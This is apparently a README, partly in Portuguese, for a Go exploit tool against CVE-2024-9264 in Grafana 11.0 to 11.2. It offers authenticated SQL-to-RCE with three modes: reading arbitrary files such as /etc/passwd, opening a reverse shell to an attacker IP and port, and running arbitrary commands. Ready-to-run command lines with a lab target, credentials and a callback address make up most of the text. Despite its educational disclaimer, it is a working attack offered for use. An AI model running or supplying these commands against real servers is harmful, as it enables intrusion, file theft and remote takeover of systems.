
A go implementation for CVE-2024-9264 which effect grafana versions 11.0.x, 11.1.x, and 11.2.x.
Ferramenta de exploit para CVE-2024-9264, uma vulnerabilidade crítica no Grafana que permite que um atacante autenticado execute consultas SQL levando a RCE
🛡️ Esta ferramenta é estritamente para fins educacionais e testes de penetração autorizados.
O uso não autorizado é ilegal e antiético.
CVE-2024-9264 é uma falha crítica no Grafana que permite que um atacante autenticado execute comandos SQL, levando a RCE e leitura de arquivos
file – Ler arquivos arbitrários (ex.: /etc/passwd)shell – Shell reverso para a máquina do atacantecommand – Executar comandos shell arbitrários (ex.: whoami)
Nem todos os argumentos são necessários.
go run main.go -ip 10.10.16.91 -port 8080 -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type shell
go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type file -filename /etc/passwd
go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type command -cmd 'ls -al'
go run main.go [flags]